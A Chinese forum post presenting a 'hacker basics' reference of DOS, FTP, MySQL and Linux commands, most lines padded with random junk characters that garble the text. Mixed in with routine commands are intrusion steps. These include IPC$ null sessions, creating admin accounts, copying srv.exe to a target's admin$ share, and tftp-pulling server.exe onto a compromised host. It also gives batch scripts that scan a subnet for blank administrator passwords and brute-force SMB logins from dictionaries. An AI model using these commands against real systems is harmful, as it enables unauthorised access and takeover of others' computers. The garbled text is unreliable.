黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 $ `$ s9 L* H  i. |
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 % q& m3 ^. ^7 |- c
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: " {5 c( G6 x' N; u8 I
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: - r! p+ Z- b0 U: j7 T, ^' P# v$ w
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
3 a  A2 h1 d( S/ l; znet use h: /del 删除映射对方到本地的为H:的映射 ; H% c6 H# [1 h
net user 用户名　密码　/add 建立用户
2 `$ Y" F5 s$ K7 g& n; hnet user guest /active:yes 激活guest用户 2 ~# A5 f) o: J# X6 Q+ i  c
net user 查看有哪些用户
& f2 Z7 R% _5 m6 R; _net user 帐户名 查看帐户的属性 2 w9 p4 P  c! B/ C
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
* l. n6 X. s: O6 {/ {$ c3 Cnet start 查看开启了哪些服务 * ^7 h# ?! o0 z3 R& r
net start 服务名　 开启服务；(如:net start telnet， net start schedule) ( r9 r  F7 c/ N. n$ F
net stop 服务名 停止某服务
1 C0 A, ?6 Y9 }" ?/ g" inet time \\目标ip 查看对方时间 : G9 `7 G2 X* |: W
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 . x  w; w/ i% W0 {: j" z9 V3 V
net view 查看本地局域网内开启了哪些共享 ( p: G0 e8 l7 A2 {
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
+ H/ g6 r6 a% n( o+ L- @$ Z  {  ^, Z/ Vnet config 显示系统网络设置 . b7 T, }# Y: Z( K1 H
net logoff 断开连接的共享
/ S5 p0 m/ S* \7 _7 Unet pause 服务名 暂停某服务
8 f" ?  M4 b8 D4 @net send ip "文本信息" 向对方发信息
+ L1 }) R" d7 ^1 \! H; Nnet ver 局域网内正在使用的网络连接类型和信息 , x- V) k' ^' k5 j5 N0 }
net share 查看本地开启的共享
. M. Q* G7 H6 m9 ^, j6 Anet share ipc$ 开启ipc$共享 7 `0 F$ ^  }/ U
net share ipc$ /del 删除ipc$共享 0 K  q5 g) e1 p% L' f' \
net share c$ /del 删除C：共享
5 L3 J7 @/ N7 Wnet user guest 12345 用guest用户登陆后用将密码改为12345
9 M4 d: B, g; bnet password 密码 更改系统登陆密码
- h+ h1 n7 g7 e8 C9 [' u0 pnetstat -a 查看开启了哪些端口,常用netstat -an
. ]* ]. F) Z. b; k% ~3 ]netstat -n 查看端口的网络连接情况，常用netstat -an
6 E4 U/ S6 {+ R  c' w& o. nnetstat -v 查看正在进行的工作 ) ^* `- |8 ]9 w
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
' t' i, q. \. Lnetstat -s 查看正在使用的所有协议使用情况 1 e% S' s) n, k3 Y6 t7 E
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 ) q8 J6 \9 F2 i5 T4 R9 ]- R
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
  v  R1 |7 C4 f& v; iping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
0 v  F( I8 ~# A4 ?% n2 ]7 }4 bping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ' c* g6 L5 z; i8 O9 r
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
7 r: E# z7 S6 m' p% ?( x6 _8 f1 itlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
' q/ N5 u+ I# L5 p$ C% Y3 nkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
5 B9 I9 B2 Y! x1 Z7 u2 [, ]% Mdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
) N% c  ^9 [9 Q# sdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
' h2 l: ]( G. A& n. u  w3 fmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
+ s  i$ Y; L' Afc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
# b, k7 n8 |4 @' qat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
/ Y' w+ T! F! m( [5 ]at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
8 D' [5 g: j5 cat id号 /delete 停止某个已注册的计划任务
- x2 F: o) g8 m5 I) g3 jat 查看所有的计划任务
3 E6 t- }: i% Yat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 8 c6 h& i6 @% s- v7 K; Q, R3 J+ R
finger username @host 查看最近有哪些用户登陆 * B6 ~- l1 b1 r9 m7 p
telnet ip 端口 远和登陆服务器,默认端口为23
9 n( ]& ~% J: ~' N, a! Copen ip 连接到IP（属telnet登陆后的命令）
$ n9 b0 z  E; X: s5 ^5 D! otelnet 在本机上直接键入telnet 将进入本机的telnet
$ T- c( h7 i6 R, o! B$ `8 A( dcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 ( F; K$ k3 W6 X3 i* T- t3 G
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
5 H: m" ^0 X  G) J  Qcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件   f! x' U4 N( k% s8 M- Y, y& V
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 4 Q! u! t: _; N
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
. S- w' U) ~3 D2 mtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 # K# D7 m$ K, H6 q) N0 a
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 : d8 b# u5 R* n5 [' G' N- ~4 c
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
# D; L/ X- J; L, o" s7 zroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface + P$ x& ]! y, E7 Y) K: a% `
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
( `5 w' N+ H, Z  S6 lstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 # d7 Z& X: ]' N& J& K6 U
mem 查看cpu使用情况
$ \- d$ x" l% b  W2 battrib 文件名(目录名) 查看某文件（目录）的属性 + ^4 @# _8 X. Z. m+ r5 T
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 2 b! W' j, Y; x; @' J+ U0 g
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
" p/ x( D9 t/ T% s- Ldate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
4 M* p$ r0 i& |+ O2 I( B! r6 kset 指定环境变量名称=要指派给变量的字符 设置环境变量 1 A  X% P& [) N# v
set 显示当前所有的环境变量 " [9 B2 Y; c6 i3 M
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
- @6 Y3 t: w+ M' C- F; L/ Gpause 暂停批处理程序，并显示出：请按任意键继续....
+ @  a  w- C# i, p# \! e1 J7 Hif 在批处理程序中执行条件处理（更多说明见if命令及变量） % R+ ?0 \( n0 a( k" f. ?
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
4 N, P+ W4 O4 S5 ^4 ]call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） & Z/ G/ i4 L$ [2 z2 O2 m
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
  w2 {$ O0 T/ T: h+ decho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 # }$ x0 ~  C0 P1 {' E
echo 信息 在屏幕上显示出信息
2 p, T  v, o) j8 |1 u6 p+ iecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 % `1 e4 I7 F# R$ e
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello # u2 z3 u# A( l8 ]
find 文件名 查找某文件 5 D0 K& l7 {6 f* r; A1 D
title 标题名字 更改CMD窗口标题名字
  _& C3 g+ I; Z8 U% ~. ~  ncolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
; r9 Z) J% n5 k3 V! Lprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
( o5 t) p4 c% Aprint 文件名 打印文本文件
! H  j; s' y$ \3 B( m; jver 在DOS窗口下显示版本信息 # X/ ~1 W" m. K& M+ D- c3 d
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） 6 D: W' i& a9 P
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
3 n5 I; s" T) O- I5 Amd　目录名 创建目录 3 F" C1 }! d' c' u, e8 d5 J& ^
replace 源文件　要替换文件的目录 替换文件
# C+ w6 ~( o  t2 ]ren 原文件名　新文件名 重命名文件名
, m5 r- {2 u0 W& ^3 p% B% ttree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
) _/ e( K' {1 P7 Atype 文件名 显示文本文件的内容 ! H. t" a* B) w' m
more 文件名 逐屏显示输出文件 5 d: a; R# t1 ^7 P& s
doskey 要锁定的命令＝字符$ Y; l$ S; ^+ i  Z0 P! u0 A8 j
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
8 {, ~  q$ _4 H: t' ttaskmgr 调出任务管理器
2 E/ z4 h  H  mchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
  u' L" \+ a$ F1 h& v% w1 j  M: jtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 ' i" F3 s& S3 {, c1 C2 F
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe 0 W/ p  p9 W0 o/ S$ u- }( G! b
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 + b, m# t; y0 r  p8 Q2 m
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
8 P, }0 o1 k1 I4 g) b3 u1 A9 Sregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
' f& V1 D0 u+ L+ g/ v& Fregedit /e 注册表文件名 导出注册表 ; o6 g+ ^; U8 N8 a: l4 i) X1 ?
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 4 O4 s1 }+ y" o
cacls 文件名 查看文件的访问用户权限列表
7 \. k* F* M; R) L) rREM 文本内容 在批处理文件中添加注解 8 E4 v  `# X1 X4 r% B) g* g, E
netsh 查看或更改本地网络配置情况" L0 [8 d$ A# Z; A
IIS服务命令：0 P+ a$ x7 ^' w
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） # L$ i5 F$ g0 C0 g, r! E
iisreset /start或stop 启动（停止）所有Internet服务 2 y# j9 ^1 I7 d) P
iisreset /restart 停止然后重新启动所有Internet服务
) o& g, O9 n: o3 t8 o! O( Viisreset /status 显示所有Internet服务状态
- q( s9 ]9 l  ]* ?iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 - R3 D, }* R: E2 }% n/ \
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
* T, S! y( c. g, ~iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
  j2 ?' T9 n; l" w& o, q- Riisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
9 v6 K9 q+ G5 s' `3 `0 y8 TFTP 命令： (后面有详细说明内容) 8 u8 @  D- X6 O. i# h, K# V+ N
ftp的命令行格式为:, b" F' K8 m1 v- g  [4 K
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
7 Z7 N; ^- ~6 i－d 使用调试方式。
- v" P) J, Z8 L－n 限制ftp的自动登录,即不使用.netrc文件。- f1 ^2 e9 ~% D& W" m6 T, m
－g 取消全局文件名。
0 i, ?2 p" L# @! ~help [命令] 或 ？[命令] 查看命令说明 $ q2 _/ }, P2 A) x# G+ F
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
* N- p, T9 R6 g6 s0 q' zpwd 列出当前远端主机目录 * r) d, T- y' }$ c' k& N
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
% T" |' N2 o7 E0 I6 K7 oget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
- u: }# C  e$ c& ~; rmget [remote-files] 从远端主机接收一批文件至本地主机 # E4 v0 b4 u  V0 r! U
mput local-files 将本地主机中一批文件传送至远端主机
6 {/ [4 L4 y* l- M. ?dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
5 A' B+ b' T1 e$ w, ~8 Eascii 设定以ASCII方式传送文件(缺省值)
- \0 w* h! i' Z; dbin 或 image 设定以二进制方式传送文件
+ e4 g4 E: P1 Z7 H+ i9 qbell 每完成一次文件传送,报警提示
6 v! ?& E: F$ z  h+ b  i" ^: z% l: m+ acdup 返回上一级目录 9 m& S- z1 a" r0 e& y" N
close 中断与远程服务器的ftp会话(与open对应)
3 g$ U) D/ A/ |2 _open host[port] 建立指定ftp服务器连接,可指定连接端口   [/ `$ C8 t/ s7 V% a2 Z& J/ c
delete 删除远端主机中的文件   U9 E/ P) Z+ K- E
mdelete [remote-files] 删除一批文件
1 R( q! P/ G& u8 a  O7 ?mkdir directory-name 在远端主机中建立目录
9 `# b& e& j( k- [6 t- Lrename [from] [to] 改变远端主机中的文件名
( I% o; r7 a8 h9 n) s# D3 S; Zrmdir directory-name 删除远端主机中的目录 % s$ T; `6 p' H9 o% v! `' e* r1 f- y
status 显示当前FTP的状态 5 x& A+ u' {+ \$ {; e
system 显示远端主机系统类型
4 f) \* z( x  ]6 q  F7 suser user-name [password] [account] 重新以别的用户名登录远端主机
5 O; V( u* [7 ?4 Aopen host [port] 重新建立一个新的连接
3 H! E' R1 n  X  o+ {5 Vprompt 交互提示模式
; w" B( h7 K+ H) Y7 ?macdef 定义宏命令
' X' p4 {+ W& H  ?" z+ C, Jlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
( A+ B4 _4 ^: `' jchmod 改变远端主机的文件权限 ( }9 e) H( }* H, ~1 w
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 6 `" ?9 i1 F) c& M: M) [: X
cd remote－dir 进入远程主机目录
% C4 [. k: M7 T9 @/ Zcdup 进入远程主机目录的父目录   C, _4 h+ x, m2 _2 R# j
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
  e7 N/ z+ [" y7 c; w* ^MYSQL 命令：
  ]& U: A: x6 h  wmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。" y' \9 y0 k0 Z" v/ \
（例：mysql -h110.110.110.110 -Uroot -P123456
( g# U5 L% K' S" A; ?8 s* T注:u与root可以不用加空格，其它也一样）
" B6 n' G) J- T/ G& Eexit 退出MYSQL   U- g, v  n3 Y( }3 P) x  ~9 R
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 5 b& [' j' F) Q5 A
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 3 N5 z1 I1 E, V! ?0 S
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
) o3 A" S( l: P6 j( y+ b1 H! Ause mysql；5 p( S4 H! P4 P  _/ R% e
show tables; 显示库中的数据表
( E# v# z. s2 |1 j" cdescribe 表名; 显示数据表的结构 ) N$ t4 T* T( t6 ^, @
create database 库名; 建库 ( T$ v2 Z+ a$ l* H2 j& K6 r( P; L
use 库名；9 i. T* d- F7 g- I! ?( V1 j
create table 表名 (字段设定列表)； 建表
3 P7 I6 J% K. Y- R( ?drop database 库名;
" [) w, l; F, D' r2 Q* F& ?drop table 表名； 删库和删表
* U2 J  X5 N) q2 n* \1 xdelete from 表名; 将表中记录清空
1 [! D7 {3 v6 i8 jselect * from 表名; 显示表中的记录 & P7 i# G# u2 R' A# i( u  U$ _
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 3 R$ z* v6 b0 Q0 Z
win2003系统下新增命令（实用部份）： 4 N- t# W3 V7 ~0 |
shutdown /参数 关闭或重启本地或远程主机。
4 }  \! R3 q2 U6 n, L5 f参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
; o! M# L3 M5 o+ T例：shutdown /r /t 0 立即重启本地主机（无延时） , c! ?& o3 q7 D& g# G7 ~" B1 d! }7 D
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
/ Y+ N5 a& w3 [; ?参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。   v: k; R9 J: w7 N
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。( ~4 n6 B: z/ q) @& T; s  |0 a
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程/ K1 U- b# I3 h5 s
Linux系统下基本命令： 要区分大小写
+ ?: t4 ^6 O+ ?- Buname 显示版本信息（同win2K的 ver） 4 R& P% ]+ k7 w2 b' J
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
6 I  e6 A$ Y8 i2 ^/ Vpwd 查询当前所在的目录位置 8 t+ Q9 W. k, j1 J& b
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
& @, v3 P- z, o1 j$ Ocat 文件名 查看文件内容 3 d0 f1 H8 a$ v& J% V6 m
cat >abc.txt 往abc.txt文件中写上内容。
. N5 e5 z0 h) z9 _1 vmore 文件名 以一页一页的方式显示一个文本文件。 , l* B  o6 f, ~. S/ Z
cp 复制文件 1 b, s8 r" B1 P. O& }7 W# z# p7 o
mv 移动文件 % O! R" s$ m. X6 b/ R! [) ~7 j8 I
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
0 a8 {8 e( T. F: Q( Z% Z+ Qmkdir 目录名 建立目录 4 z1 @/ {, [! T( b) N; I) J: N, k( |
rmdir 删除子目录，目录内没有文档。
* r3 I: [! T6 V! l9 u3 N2 zchmod 设定档案或目录的存取权限
( W+ T* c& M7 ^  ]5 ?grep 在档案中查找字符串 6 z3 B7 e  I% J% {+ V- l- P: G
diff 档案文件比较 3 |$ }" `9 @9 j7 Y# J2 U
find 档案搜寻
" U" L1 r: F" w) Pdate 现在的日期、时间
0 y5 Z0 `( A" G) y" M- \: W9 Mwho 查询目前和你使用同一台机器的人以及Login时间地点 # S2 {+ k- _; J$ }% T2 Q; w1 x5 b& r
w 查询目前上机者的详细资料 * ~7 k' u  f4 o$ c
whoami 查看自己的帐号名称 $ J0 I, C0 l0 J/ l; Y( n
groups 查看某人的Group
4 N7 p( o. U7 ~, a' U9 `passwd 更改密码
# j! Q7 e* p5 P: V1 Yhistory 查看自己下过的命令
/ m7 _* L- E: N- G; t4 F/ {" bps 显示进程状态 1 J7 P: p: h! o# j! _8 S2 f5 b9 e: Q( Y& b9 c
kill 停止某进程 1 L$ D$ _3 |! K& e2 y3 K6 `8 ^
gcc 黑客通常用它来编译C语言写的文件
! S) ~- L7 ?: O2 ^$ Asu 权限转换为指定使用者
3 T1 g( M9 c8 p. atelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
0 c# ?) `8 M* a" [* l9 Eftp ftp连接上某服务器（同win2K7 K  k! b# B5 B% i1 D
附：批处理命令与变量# d0 n2 Q/ z, K. g
1：for命令及变量 基本格式：
- {6 p+ R. G. l5 ?; NFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
5 S# Q' u  _& O1 P/ f3 f+ g6 Y批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
) ~' l4 n) K+ t2 z(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}( H. t  h. |( ^; C
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开3 p/ A* A0 _9 v0 A: l$ z- D- Q
command_parameters：为特定命令指定参数或命令行开关
! D5 [9 `& f  M5 DIN (set)：指在(set)中取值；DO command ：指执行command8 d) c& u! O9 C  Y# y: R2 n
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 4 m5 _* {8 G" m8 _/ i
用法举例： 3 L: ?- h; \% O# L, R+ `
@echo off $ d7 ^7 M, b" R7 k
echo 用法格式：test.bat *.*.* > test.txt
# J: R1 z! O% M# Tfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 1 ]- Y, Y& c% c
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。1 W2 p9 v( D9 ]& j" r, K
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
* [9 [$ w" b! g/ v# v: A@echo off 9 E* `2 Q; E! N8 y/ ^/ v
echo 用法格式：ok.bat ip $ V6 [; [1 N8 U) A  J* G
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
" N1 n1 Y" k& f9 K5 v9 V7 M存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。) k8 p- ]0 n+ W- [1 N3 ?/ G
2：if命令及变量 基本格式： ' P" n- A6 v/ D9 g$ ?
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
. B7 g6 l% b* l; q$ N3 m! v例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。9 [0 N  ~1 \2 x2 Y% f6 v
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
9 j2 @# D% a2 h0 m" f6 IIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
6 L4 x8 |7 n3 O: Q例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 5 ]8 [$ N5 h! g  c! m8 M5 M
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
6 u; D" h. z; v例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
( a( t) _' X' Z  d9 ~8 y' ZIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”